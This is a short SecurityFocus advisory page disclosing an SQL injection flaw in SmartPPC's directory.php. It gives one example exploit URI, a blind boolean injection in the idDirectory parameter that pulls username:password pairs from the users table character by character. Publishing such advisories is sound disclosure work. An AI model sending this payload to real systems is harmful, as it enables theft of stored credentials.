Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SmartPPC 'directory.php' SQL Injection Vulnerability

Attackers can exploit this issue with a browser.

The following example URI and exploit code are available:

http://www.example.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108







 

Privacy Statement
Copyright 2009, SecurityFocus